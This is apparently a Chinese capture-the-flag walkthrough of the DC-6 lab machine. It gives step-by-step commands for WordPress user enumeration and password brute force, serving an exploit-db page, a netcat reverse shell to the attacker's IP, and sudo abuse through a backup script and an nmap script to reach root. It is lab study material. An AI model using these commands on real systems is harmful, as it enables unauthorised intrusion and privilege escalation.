DC-6靶机实战练习

环境:VMware 15虚拟机软件

DC-6靶机IP地址:192.168.146.136

Kali的IP地址:192.168.146.130

文章目录

      • 第一步 主机扫描
      • 第二步 扫描开放的端口
      • 第三步 访问80端口---此时需要重定向设置
      • 第四步 扫描后台目录 以及账号密码
      • 第五步 获取登录账号和密码
      • 第六步 登录mark账号-
      • 第七步 漏洞利用
      • 第八步 kali开启临时http服务 访问45274.html页面
      • 第九步 切换shell进入交互模式,并进入mark的家目录下查找文件
      • 第十步 切换 graham
      • 第十一步 写入脚本,切换到jens账号
      • 第十二步 nmap提权
      • 免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

第一步 主机扫描

[nmap -sP 192.168.0/24]
DC-6靶机实战练习_第1张图片

第二步 扫描开放的端口

[nmap -sV 192.168.146.136]
DC-6靶机实战练习_第2张图片

第三步 访问80端口—此时需要重定向设置

  • linux下设置
    DC-6靶机实战练习_第3张图片

  • window下设置
    DC-6靶机实战练习_第4张图片DC-6靶机实战练习_第5张图片

第四步 扫描后台目录 以及账号密码

[wpscan --url http://wordy/ -e u]
adminsarahgrahammarkjens-
DC-6靶机实战练习_第6张图片DC-6靶机实战练习_第7张图片DC-6靶机实战练习_第8张图片

第五步 获取登录账号和密码

DC-6靶机实战练习_第9张图片
[wpscan --url http://wordy/ -U aa.txt -P passwd]markhelpdesk01
方法一:使用kali里面的 wpscan爆破
DC-6靶机实战练习_第10张图片DC-6靶机实战练习_第11张图片
方法二:使用burpSuit抓包爆破-
在这里插入图片描述DC-6靶机实战练习_第12张图片

第六步 登录mark账号-

DC-6靶机实战练习_第13张图片DC-6靶机实战练习_第14张图片

第七步 漏洞利用

我们直接复制html进行修改[cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html]
[vim 45274.html]
在这里插入图片描述DC-6靶机实战练习_第15张图片

第八步 kali开启临时http服务 访问45274.html页面

[python -m SimpleHTTPServer 80]
DC-6靶机实战练习_第16张图片DC-6靶机实战练习_第17张图片
[nc -lvvp 9999]
方法二 burpsuit抓包 进行反弹shell
[nc 192.168.146.130 9999 -e /bin/bash]
DC-6靶机实战练习_第18张图片

第九步 切换shell进入交互模式,并进入mark的家目录下查找文件

python -c ‘import pty;pty.spawn("/bin/bash")’
[cd /home/mark/stuff]
[cat things-to-do.txt]
获得 账号/密码 user: graham - GSo7isUM1D4
DC-6靶机实战练习_第19张图片

第十步 切换 graham

[ssh [email protected]]
[sudo -l]
[cd /home/jens/ ]
[cat backups.sh]
是对web的文件进行打包备份的
DC-6靶机实战练习_第20张图片

第十一步 写入脚本,切换到jens账号

[echo “/bin/bash” >> backups.sh ]
[cat backups.sh ]
[sudo -u jens ./backups.sh]
DC-6靶机实战练习_第21张图片

第十二步 nmap提权

[echo ‘os.execute("/bin/sh")’ > getshell]
[sudo nmap --script=getshell]
[cd /root]
[cat theflag.txt]
DC-6靶机实战练习_第22张图片

免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

你可能感兴趣的:(靶机练习)